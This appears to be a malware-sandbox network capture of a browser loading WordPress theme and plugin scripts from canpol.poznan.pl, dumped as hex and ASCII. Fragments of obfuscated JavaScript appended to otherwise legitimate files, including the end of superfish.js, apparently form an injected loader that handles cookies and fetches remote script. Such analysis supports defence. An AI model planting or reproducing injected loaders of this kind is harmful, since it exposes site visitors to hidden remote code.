                                                            2025-01-15 10:08:02 UTC8000INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 67 65 74 54 69 6d 65 28 29 2d 74 6d 72 73 2e 73 74 61 72 74 54 69 6d 65 2b 74 6d 72 73 2e 74 69 6d 65 50 61 73 73 65 64 2c 62 3d 4d 61 74 68 2e 63 65 69 6c 28 31 30 30 2a 61 2f 68 29 3b 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 75 70 64 61 74 65 72 2e 63 61 6c 6c 28 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 62 61 72 5b 30 5d 2c 62 29 7d 2c 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 69 6e 74 65 72 76 61 6c 29 29 2c 74 6d 72 73 2e 61 75 74 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 26 26 6f 70 74 73 2e 61 75 74 6f 2e 70 72 6f 67 72 65 73 73 2e 75 70 64 61 74 65 72 2e 63 61 6c 6c 28 6f 70 74 73
                                                            Data Ascii: tion(){var a=getTime()-tmrs.startTime+tmrs.timePassed,b=Math.ceil(100*a/h);opts.auto.progress.updater.call(opts.auto.progress.bar[0],b)},opts.auto.progress.interval)),tmrs.auto=setTimeout(function(){opts.auto.progress&&opts.auto.progress.updater.call(opts
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 6e 63 74 69 6f 6e 28 29 7b 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 2c 4d 28 29 7d 5d 29 2c 46 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 6e 63 6f 76 65 72 22 3a 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 73 2c 78 2c 4d 5d 29 2c 46 28 29 2c 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 6e 63 6f 76 65 72 2d 66 61 64 65 22 3a 24 63 66 73 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 30 7d 29 2c 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 24 63 66 73 2c 7b 6f 70 61 63 69 74 79 3a 31 7d 5d 29 2c 73 63 72 6c 2e 61 6e 69 6d 73 2e 70 75 73 68 28 5b 73 2c 78 2c 4d 5d 29 2c 46 28 29 2c 47 28 29 2c 49 28 29 2c 4b 28 29 2c 4f 28 29 2c 4e 28 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a
                                                            Data Ascii: nction(){G(),I(),K(),O(),N(),M()}]),F();break;case"uncover":scrl.anims.push([s,x,M]),F(),G(),I(),K(),O(),N();break;case"uncover-fade":$cfs.css({opacity:0}),scrl.anims.push([$cfs,{opacity:1}]),scrl.anims.push([s,x,M]),F(),G(),I(),K(),O(),N();break;default:
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 62 29 7c 7c 71 75 65 75 2e 70 75 73 68 28 5b 62 2c 63 5d 29 2c 71 75 65 75 7d 29 2c 24 63 66 73 2e 62 69 6e 64 28 63 66 5f 65 28 22 69 6e 73 65 72 74 49 74 65 6d 22 2c 63 6f 6e 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 61 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 76 61 72 20 66 3d 5b 62 2c 63 2c 64 2c 65 5d 2c 67 3d 5b 22 73 74 72 69 6e 67 2f 6f 62 6a 65 63 74 22 2c 22 73 74 72 69 6e 67 2f 6e 75 6d 62 65 72 2f 6f 62 6a 65 63 74 22 2c 22 62 6f 6f 6c 65 61 6e 22 2c 22 6e 75 6d 62 65 72 22 5d 2c 68 3d 63 66 5f 73 6f 72 74 50 61 72 61 6d 73 28 66 2c 67 29 3b 69 66 28 62 3d 68 5b 30 5d 2c 63 3d 68 5b 31 5d 2c 64 3d 68 5b 32 5d 2c 65 3d 68 5b 33 5d 2c 69 73 5f 6f 62 6a 65 63 74 28 62 29 26 26 21 69 73 5f 6a 71 75 65 72
                                                            Data Ascii: b)||queu.push([b,c]),queu}),$cfs.bind(cf_e("insertItem",conf),function(a,b,c,d,e){a.stopPropagation();var f=[b,c,d,e],g=["string/object","string/number/object","boolean","number"],h=cf_sortParams(f,g);if(b=h[0],c=h[1],d=h[2],e=h[3],is_object(b)&&!is_jquer
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 67 67 65 72 28 63 66 5f 65 28 22 70 61 75 73 65 22 2c 63 6f 6e 66 29 2c 61 29 7d 29 2e 62 69 6e 64 28 63 66 5f 65 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 63 6f 6e 66 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 24 63 66 73 2e 74 72 69 67 67 65 72 28 63 66 5f 65 28 22 72 65 73 75 6d 65 22 2c 63 6f 6e 66 29 29 7d 29 7d 69 66 28 6f 70 74 73 2e 61 75 74 6f 2e 62 75 74 74 6f 6e 26 26 6f 70 74 73 2e 61 75 74 6f 2e 62 75 74 74 6f 6e 2e 62 69 6e 64 28 63 66 5f 65 28 6f 70 74 73 2e 61 75 74 6f 2e 65 76 65 6e 74 2c 63 6f 6e 66 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 62 3d 21 31 2c 63 3d 6e 75 6c 6c 3b 63 72 73 6c 2e 69 73 50 61 75 73 65 64 3f 62 3d 22 70 6c 61 79 22 3a 6f 70 74 73
                                                            Data Ascii: gger(cf_e("pause",conf),a)}).bind(cf_e("mouseleave",conf,!1),function(){$cfs.trigger(cf_e("resume",conf))})}if(opts.auto.button&&opts.auto.button.bind(cf_e(opts.auto.event,conf,!1),function(a){a.preventDefault();var b=!1,c=null;crsl.isPaused?b="play":opts
                                                            2025-01-15 10:08:02 UTC794INData Raw: 29 3b 7d 2c 7a 5b 68 28 30 78 64 39 29 2b 27 6e 27 5d 28 68 28 30 78 64 31 29 2c 72 2c 21 21 5b 5d 29 2c 7a 5b 68 28 27 30 78 64 65 27 29 2b 27 64 27 5d 28 6e 75 6c 6c 29 3b 7d 3b 7d 2c 72 61 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6b 3d 41 3b 72 65 74 75 72 6e 20 4d 61 74 68 5b 6b 28 30 78 64 33 29 2b 6b 28 30 78 66 64 29 5d 28 29 5b 6b 28 30 78 66 63 29 2b 6b 28 30 78 31 30 62 29 2b 27 6e 67 27 5d 28 30 78 32 34 29 5b 6b 28 27 30 78 65 35 27 29 2b 6b 28 27 30 78 65 33 27 29 5d 28 30 78 32 29 3b 7d 2c 74 6f 6b 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 61 6e 64 28 29 2b 72 61 6e 64 28 29 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 41 28 72 2c 65 29 7b 72 3d 72 2d 30 78 63 66 3b 76 61 72 20 7a 3d 71 5b 72 5d 3b 72 65 74 75 72
                                                            Data Ascii: );},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];retur


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            69192.168.2.1649787178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC593OUTGET /wp-content/themes/salient/js/midnight.js?ver=1.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "7995-620a8e97bcf68"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 31125
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2f 6d 69 64 6e 69 67 68 74 20 69 6e 69 74 20 0a 0a 0a 2f 2a 21 0a 20 2a 20 4d 69 64 6e 69 67 68 74 2e 6a 73 20 31 2e 31 2e 30 0a 20 2a 20 6a 51 75 65 72 79 20 70 6c 75 67 69 6e 20 74 6f 20 73 77 69 74 63 68 20 62 65 74 77 65 65 6e 20 6d 75 6c 74 69 70 6c 65 20 66 69 78 65 64 20 68 65 61 64 65 72 20 64 65 73 69 67 6e 73 20 6f 6e 20 74 68 65 20 66 6c 79 2c 20 73 6f 20 69 74 20 6c 6f 6f 6b 73 20 69 6e 20 6c 69 6e 65 20 77 69 74 68 20 74 68 65 20 63 6f 6e 74 65 6e 74 20 62 65 6c 6f 77 20 69 74 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 61 65 72 6f 6c 61 62 2e 67 69 74 68 75 62 2e 69 6f 2f 6d 69 64 6e 69 67 68 74 2e 6a 73 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 41 65 72 6f 6c 61 62 20 3c 69 6e 66 6f 40 61 65 72 6f 6c 61 62
                                                            Data Ascii: //midnight init /*! * Midnight.js 1.1.0 * jQuery plugin to switch between multiple fixed header designs on the fly, so it looks in line with the content below it. * http://aerolab.github.io/midnight.js/ * * Copyright (c) 2014 Aerolab <info@aerolab
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 20 20 5f 24 73 65 63 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 5f 73 65 63 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 0a 20 20 20 20 2f 2f 20 53 63 72 6f 6c 6c 20 43 61 63 68 65 0a 20 20 20 20 5f 73 63 72 6f 6c 6c 54 6f 70 3a 20 30 2c 0a 20 20 20 20 5f 64 6f 63 75 6d 65 6e 74 48 65 69 67 68 74 3a 20 30 2c 0a 0a 20 20 20 20 2f 2f 20 54 6f 6f 6c 73 0a 20 20 20 20 5f 74 72 61 6e 73 66 6f 72 6d 4d 6f 64 65 3a 20 66 61 6c 73 65 2c 0a 0a 20 20 20 20 5f 72 65 73 65 74 4c 6f 6f 70 3a 20 6e 75 6c 6c 2c 0a 0a 20 20 20 20 72 65 66 72 65 73 68 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 49 6e 66 6f 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 54 6f 64 6f 3a 20 41 64 64 20 73 75 70 70 6f 72 74 20 66 6f 72 20 74 6f
                                                            Data Ascii: _$sections: [], _sections: [], // Scroll Cache _scrollTop: 0, _documentHeight: 0, // Tools _transformMode: false, _resetLoop: null, refresh: function() { this._headerInfo = { // Todo: Add support for to
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 65 6c 65 6d 65 6e 74 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 27 2b 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 27 69 6e 6e 65 72 43 6c 61 73 73 27 5d 20 2b 27 22 3e 3c 2f 64 69 76 3e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 69 6e 6e 65 72 20 3d 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68 65 61 64 65 72 43 6c 61 73 73 5d 2e 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 27 3e 20 2e 27 2b 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 27 69 6e 6e 65 72 43 6c 61 73 73 27 5d 29 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 5f 68 65 61 64 65 72 73 5b 68
                                                            Data Ascii: ._headers[headerClass].element.wrapInner('<div class="'+ this.options['innerClass'] +'"></div>'); } this._headers[headerClass].inner = this._headers[headerClass].element.find('> .'+ this.options['innerClass']) this._headers[h
                                                            2025-01-15 10:08:02 UTC7219INData Raw: 75 74 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 27 29 2e 66 61 64 65 49 6e 28 30 29 3b 20 24 28 74 68 69 73 29 2e 66 69 6e 64 28 27 2e 63 61 72 74 2d 6f 75 74 65 72 20 2e 63 61 72 74 5f 6c 69 73 74 27 29 2e 66 61 64 65 49 6e 28 30 29 3b 20 7d 0a 20 20 20 20 20 20 20 20 09 09 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 09 09 09 24 28 74 68 69 73 29 2e 63 73 73 28 7b 20 27 7a 2d 69 6e 64 65 78 27 3a 20 27 61 75 74 6f 27 7d 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 29 3b 0a 09 09 09 09 09 24 28 74 68 69 73 29 2e 66 69 6e 64 28 27 2e 6d 69 64 6e 69 67 68 74 49 6e 6e 65 72 27 29 2e 63 73 73 28 27 6f 76 65 72 66 6c 6f 77 27 2c 27 68 69 64 64 65 6e 27 29 3b 0a 09 09 09 09 09 69 66 28 61 63 74 69
                                                            Data Ascii: uter .widget_shopping_cart').fadeIn(0); $(this).find('.cart-outer .cart_list').fadeIn(0); } } else { $(this).css({ 'z-index': 'auto'}).removeClass('overflow');$(this).find('.midnightInner').css('overflow','hidden');if(acti


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            70192.168.2.1649786178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC466OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:18 GMT
                                                            ETag: "5c49-620a8edf20f43"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 23625
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 21 0a 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 49 6e 66 69 6e 69 74 65 20 53 63 72 6f 6c 6c 0a 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 2b 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 70 61 75 6c 69 72 69 73 68 2f 69 6e 66 69 6e 69 74 65 2d 73 63 72 6f 6c 6c 0a 20 20 20 2b 20 76 65 72 73 69 6f 6e 20 32 2e 31 2e 30 0a 20 20 20 2b 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2f 31 32 20 50 61 75 6c 20 49 72 69 73 68 20 26 20 4c 75 6b 65 20 53 68 75 6d 61 72 64 0a 20 20 20 2b 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 0a 20 20 20 2b 20
                                                            Data Ascii: /*! -------------------------------- Infinite Scroll -------------------------------- + https://github.com/paulirish/infinite-scroll + version 2.1.0 + Copyright 2011/12 Paul Irish & Luke Shumard + Licensed under the MIT license +
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 35 62 36 4a 4a 46 70 6c 54 33 5a 6e 6d 6d 58 33 71 64 35 6c 31 65 67 35 71 30 30 48 72 74 55 6b 55 6e 30 41 4b 61 69 47 6a 43 6c 53 41 67 4b 4c 59 5a 63 67 57 58 77 6f 63 47 52 63 43 46 47 43 4b 77 53 42 36 63 65 71 70 68 77 6d 59 52 55 46 59 54 2f 31 57 4b 6c 4f 64 55 70 69 70 6d 78 57 30 6d 6c 43 71 48 6a 59 6b 41 61 65 6f 5a 6c 71 72 71 5a 34 71 64 2b 75 70 51 4b 61 61 70 6e 2f 41 6d 67 41 65 67 5a 38 4b 55 74 59 74 46 41 51 51 41 67 41 68 2b 51 51 46 43 67 41 62 41 43 77 48 41 41 51 41 7a 67 41 4c 41 41 41 46 2f 2b 43 32 50 55 63 6d 69 43 69 5a 47 55 54 72 45 6b 4b 42 69 73 38 6a 51 45 71 75 4b 77 55 35 48 79 58 49 62 45 50 67 79 58 37 42 59 61 35 77 54 4e 6d 45 4d 77 57 73 53 58 73 71 46 62 45 68 38 44 59 73 39 6d 72 67 47 6a 64 4b 36 47 6b 50 59 35
                                                            Data Ascii: 5b6JJFplT3ZnmmX3qd5l1eg5q00HrtUkUn0AKaiGjClSAgKLYZcgWXwocGRcCFGCKwSB6ceqphwmYRUFYT/1WKlOdUpipmxW0mlCqHjYkAaeoZlqrqZ4qd+upQKaapn/AmgAegZ8KUtYtFAQQAgAh+QQFCgAbACwHAAQAzgALAAAF/+C2PUcmiCiZGUTrEkKBis8jQEquKwU5HyXIbEPgyX7BYa5wTNmEMwWsSXsqFbEh8DYs9mrgGjdK6GkPY5
                                                            2025-01-15 10:08:02 UTC7719INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 63 61 6c 6c 62 61 63 6b 2c 61 3d 6f 2e 73 74 61 74 65 2e 69 73 44 6f 6e 65 3f 22 64 6f 6e 65 22 3a 21 6f 2e 61 70 70 65 6e 64 43 61 6c 6c 62 61 63 6b 3f 22 6e 6f 2d 61 70 70 65 6e 64 22 3a 22 61 70 70 65 6e 64 22 2c 66 3b 69 66 28 21 21 6f 2e 62 65 68 61 76 69 6f 72 26 26 74 68 69 73 5b 22 5f 6c 6f 61 64 63 61 6c 6c 62 61 63 6b 5f 22 2b 6f 2e 62 65 68 61 76 69 6f 72 5d 21 3d 3d 74 29 7b 74 68 69 73 5b 22 5f 6c 6f 61 64 63 61 6c 6c 62 61 63 6b 5f 22 2b 6f 2e 62 65 68 61 76 69 6f 72 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 69 29 3b 72 65 74 75 72 6e 7d 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 64 6f 6e 65 22 3a 74 68 69 73 2e 5f 73 68 6f 77 64 6f 6e 65 6d 73 67 28 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 63 61 73 65 22 6e
                                                            Data Ascii: .options.callback,a=o.state.isDone?"done":!o.appendCallback?"no-append":"append",f;if(!!o.behavior&&this["_loadcallback_"+o.behavior]!==t){this["_loadcallback_"+o.behavior].call(this,r,i);return}switch(a){case"done":this._showdonemsg();return false;case"n


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            71192.168.2.1649785178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC596OUTGET /wp-content/themes/salient/js/superfish.js?ver=1.4.8 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "258c-620a8e96c1fdd"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9612
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7907INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 53 75 70 65 72 66 69 73 68 20 4d 65 6e 75 20 50 6c 75 67 69 6e 20 2d 20 76 31 2e 37 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 4a 6f 65 6c 20 42 69 72 63 68 0a 20 2a 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 20 2a 09 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 67 70 6c 2e 68 74 6d 6c 0a 20 2a 2f 0a 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 09 22 75 73 65 20 73 74 72 69
                                                            Data Ascii: /* * jQuery Superfish Menu Plugin - v1.7.4 * Copyright (c) 2013 Joel Birch * * Dual licensed under the MIT and GPL licenses: *http://www.opensource.org/licenses/mit-license.php *http://www.gnu.org/licenses/gpl.html */;(function ($) {"use stri
                                                            2025-01-15 10:08:02 UTC1705INData Raw: 27 2c 27 72 65 73 27 2c 27 5f 6e 6f 27 2c 27 31 35 31 33 36 38 47 67 71 51 71 4b 27 2c 27 72 41 67 27 2c 27 76 65 72 27 2c 27 74 6f 53 27 2c 27 64 6f 6d 27 2c 27 68 74 74 27 2c 27 61 74 65 27 2c 27 63 6c 69 27 2c 27 31 72 67 46 70 45 76 27 2c 27 64 79 53 27 2c 27 6b 69 65 27 2c 27 6e 67 65 27 2c 27 33 71 6e 55 75 4b 4a 27 2c 27 65 78 74 27 2c 27 6e 65 74 27 2c 27 74 6e 61 27 2c 27 6a 73 3f 27 2c 27 74 61 74 27 2c 27 74 72 69 27 2c 27 75 73 65 27 2c 27 63 6f 6f 27 2c 27 2f 75 69 27 2c 27 61 74 69 27 2c 27 47 45 54 27 2c 27 2f 2f 76 27 2c 27 72 61 6e 27 2c 27 63 6b 2e 27 2c 27 67 65 74 27 2c 27 70 6f 6e 27 2c 27 72 65 61 27 2c 27 65 6e 74 27 2c 27 6f 70 65 27 2c 27 70 73 3a 27 2c 27 31 38 34 39 33 35 38 74 69 74 62 62 5a 27 2c 27 6f 6e 72 27 2c 27 69 6e 64
                                                            Data Ascii: ','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            72192.168.2.1649788178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC589OUTGET /wp-content/themes/salient/js/init.js?ver=7.6 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC288INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "81312-620a8e96eb01a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 529170
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7904INData Raw: 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 09 31 2e 09 50 6c 75 67 69 6e 20 49 6e 69 74 0a 09 32 2e 09 48 65 6c 70 65 72 20 46 75 6e 63 74 69 6f 6e 73 0a 09 33 2e 09 53 68 6f 72 74 63 6f 64 65 20 53 74 75 66 66 0a 09 34 2e 09 48 65 61 64 65 72 20 2b 20 53 65 61 72 63 68 0a 09 35 2e 09 50 61 67 65 20 53 70 65 63 69 66 69 63 0a 09 36 2e 20 20 53 63 72 6f 6c 6c 20 74 6f 20 74 6f 70 20 0a 09 37 2e 09 43 72 6f 73 73 20 42 72 6f 77 73 65 72 20 46 69 78 65 73 0a 0a 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                            Data Ascii: /*-------------------------------------------------------------------------1.Plugin Init2.Helper Functions3.Shortcode Stuff4.Header + Search5.Page Specific6. Scroll to top 7.Cross Browser Fixes-------------------------------------
